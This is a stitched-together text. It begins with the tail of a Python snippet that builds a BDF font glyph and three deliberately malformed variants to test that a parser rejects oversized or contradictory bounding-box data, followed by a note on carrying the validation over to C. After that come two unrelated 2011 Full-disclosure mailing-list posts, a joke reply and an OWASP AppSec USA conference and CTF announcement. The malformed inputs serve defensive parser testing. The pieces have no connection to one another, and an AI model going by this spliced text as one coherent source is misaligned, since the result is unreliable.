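    "SWIDTH 500 0",
    "DWIDTH 5 0",
    "BBX 5 8 0 -1",
    "BITMAP",
    "20", "50", "88", "88", "F8", "88", "88", "00",
    "ENDCHAR",
    "ENDFONT",
])
# Three malformed variants, each contradicting the declared BBX in a different way.
OVERLONG_ROW_BDF = GOOD_BDF.replace("\n20\n", "\n" + "41" * 32 + "\n", 1)
TOO_MANY_ROWS_BDF = GOOD_BDF.replace("\nENDCHAR", "\n00\nENDCHAR", 1)
HUGE_BBX_BDF = GOOD_BDF.replace("BBX 5 8 0 -1", "BBX 5 100000 0 -1", 1)

if __name__ == "__main__":
    print(parse_bdf(GOOD_BDF))
    for bad in (OVERLONG_ROW_BDF, TOO_MANY_ROWS_BDF, HUGE_BBX_BDF):
        print("rejected:", rejects(bad))
```

The pattern to carry over to C is that the BBX numbers drive an allocation, so they are validated first against a hard ceiling, and every subsequent row is checked against both the per-row byte count and the row count before it is written anywhere.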
Re: [Full-disclosure] Warning is about vulnerability
You are the Borat of FD.

2011/6/4 Григорий Братислава musntl...@gmail.com
> Hello is list!! I is like to warn you is about vulnerability. Is vulnerability is what get Sony, RSA, L3, Google and is Hilary Clinton hacked. Please is watch vulnerabilities and is never forgot when is you use !! many times, is many more take your advisories is serious!!
>
> http://www.thinkgeek.com/tshirts-apparel/unisex/popculture/78c6/
>
> --
> `I am epic win`

--
ciao
JT
[Full-disclosure] AppSec USA 2011 CFP Reminder, CTF Pre-Conference Challenge #2
Hello netizens!

This is an update about the OWASP AppSec USA 2011 software security conference in Minneapolis this September.

CALL FOR PAPERS

Have something important to say about software security? The OWASP AppSec USA 2011 Call for Papers is still open. We're looking for hardcore talks in cloud security, mobile security, new attacks and defenses, and straight up software development platforms. Get your submission in before time runs out. And have your developer friends submit a talk!

http://www.appsecusa.org/talks.html

The AppSec USA 2011 talks will be delivered September 22-23, 2011 in Minneapolis, Minnesota. In addition to the talks, we'll have excellent keynotes like Moxie Marlinspike.

CAPTURE THE FLAG PRE-CONFERENCE CHALLENGE #2

Last month *ChrisKarel* won pre-conference challenge #1 for a pass to the OWASP AppSec USA 2011 talks. Congratulations, ChrisKarel! For June, we're back with another chance for you to score a free conference pass and get a feel for the AppSec USA 2011 CTF challenges coming this September. Good luck.

http://www.appsecusa.org/ctf.html

TRAINING

We have awesome training at a fair price. Register for mobile security, penetration testing, secure coding, and attack detection and response courses being held September 20-21. Hurry before classes fill up.

http://www.appsecusa.org/training.html

MORE APPSEC USA 2011

Check out www.appsecusa.org for other events including a 5K / 10K charity run, the first ever Women in AppSec grant, and a chance to have your own original music played at the conference.

Thanks to our wonderful supporters - check them out at www.appsecusa.org!

--
Adam Baso
OWASP AppSec USA 2011: Your life is in the cloud.
September 20-23
Training, Talks, CTF, Showroom, and More
www.appsecusa.org
@appsecusa